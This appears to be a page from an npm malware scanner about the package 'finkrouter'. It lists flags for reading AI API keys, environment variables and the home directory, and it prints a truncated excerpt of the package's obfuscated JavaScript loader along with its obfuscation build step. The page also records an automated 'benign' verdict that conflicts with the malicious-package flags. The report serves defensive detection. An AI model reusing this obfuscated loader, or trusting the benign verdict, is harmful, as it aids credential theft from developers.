// npm 패키지
finkrouter
FINK Orchestrator Core - Enterprise Installer
버전
3
메인테이너
1
라이선스
MIT
최초 publish
2026-05-22
publisher
finkrouter
tarball
90,997 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-22
// exfil path
what is read → where it shipssteals
- ● AI API keys
- ○ home dir
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> const a0_0x1bdb09=a0_0x15c2;(function(_0x897fcd,_0x5ddd0f){const _0x21ce1e=a0_0x15c2,_0x326d79=_0x897fcd();while(!![]){try{const _0x4af02f=-parseInt(_0x21ce1e(0x3ef,'3MDl'))/0x1+parseInt(_0x21ce1e(0x4…// offending code· @1.1.1· 1 file flagged
llm: benign · 0.85→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
- @1.1.1··AUTO-PUBLISHED·publisher: finkrouterheuristic 75/100static flags 5llm benign (0.85) via ollamanew-publisher:4dosv-flagged:MAL-2026-4563reads-ai-api-keysreads-env-varsreads-homedirlong-base64-literalchild-process-spawn
→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
// offending code· 1 file flaggedpatterns: 5
--- install scripts --- ### prepublishOnly bunx javascript-obfuscator cli.js --output cli.obf.js --target node --compact true --control-flow-flattening true --string-array true --string-array-encoding rc4 --- package/cli.obf.js (excerpt) --- #!/usr/bin/env node const a0_0x1bdb09=a0_0x15c2;(function(_0x897fcd,_0x5ddd0f){const _0x21ce1e=a0_0x15c2,_0x326d79=_0x897fcd();while(!![]){try{const _0x4af02f=-parseInt(_0x21ce1e(0x3ef,'3MDl'))/0x1+parseInt(_0x21ce1e(0x43b,'W8!F'))/0x2+-parseInt(_0x21ce1e(0x343,'jAlq'))/0x3+-parseInt(_0x21ce1e(0x4e7,'8ml)'))/0x4*(parseInt(_0x21ce1e(0x3c8,'fk13'))/0x5)+-parseInt(_0x21ce1e(0x255,']hUb'))/0x6*(-parseInt(_0x21ce1e(0x2a7,'V0ej'))/0x7)+-parseInt(_0x21ce1e(0x53d,'h%0o'))/0x8*(-parseInt(_0x21ce1e(0x506,'bf(U'))/0x9)+parseInt(_0x21ce1e(0x47e,'8ml)'))/0xa*(parseInt(_0x21ce1e(0x42e,']hUb'))/0xb);if(_0x4af02f===_0x5ddd0f)break;else _0x326d79['push'](_0x326d79['shift']());}catch(_0x2f8bdb){_0x326d79['push'](_0x326d79['shift']());}}}(a0_0x50ef,0x22022));function a0_0x50ef(){const _0x110f6f=['WO5kkxS','WO3cJmklw8kxWRvb','WRzaWPPJW4yXs8osCY3cIWJdI8kykSkBWOXMD8kksSkgW4xdTmoOW7FcKI/dQc9aA0eqWRbqhmoUyCofW4RcS8k7BrWpcbVdQ8kCWPDNlH/cVSoGWRDmW4mbW6xdLMFcJXG8WQxdMCkBWQTWW7/dQ8ogDmoXEY0EWOBdR8o1gmoPyCofW5nce8oSnqTVW7jmW5WQWONdSCkqWQecW4lcVSonx8o8WQtdVSk/hmoUBaTTtCkAW7iWWOnMn3O2W7HfWO5V','W6qeWR/cJSoPWQ4/rcpdS25NmCoXWQfdjgy','W6/dTKldMCoOW5e2','xeRdKmkHW4m','k8oVbCoWW7m','WQ1cWP/cJ8oQWQm0scpdObfbmCoRWQfBmhFdNcxdJ8kicuVdKCoXgmkz','WQZcJCkvsSksWRbFaCkTomoMhWPtW5VdJSkIgCkLgL3dUmkTW5FdR8kq','eCkNW6tdRbFcK8k/iSoosXm','kaxdGc/dJmk/E0ldOaNcLCk8W53cRaWRW6hcNZXhW6TfcWVdVfTxcIKBWOjJW5NdUCk8WRBcNHtcUchdR8o6ibxcMmo6WRP+DCkSWOtcVJ8AWOlcP8oLW5FdK0fQWP42daNdGCk0mbL4WQlcUYWPxmkEW5hdGZTpdSkgpSkUWQpcPCo1W4VdNCkLWOGnj
